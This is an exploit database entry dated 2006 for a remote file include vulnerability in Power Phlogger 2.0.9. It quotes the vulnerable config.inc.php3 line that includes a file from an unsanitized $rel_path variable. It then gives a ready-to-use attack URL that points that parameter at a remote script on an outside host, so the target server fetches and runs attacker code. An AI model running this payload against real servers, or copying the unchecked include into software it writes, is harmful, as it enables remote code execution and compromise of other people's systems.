Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability

2006-10-19T00:00:00
ID 1337DAY-ID-1030
Type zdt
Reporter x_w0x
Modified 2006-10-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
====================================================================



#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Author:    x_w0x
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt



#  0day.today [2018-01-11]  #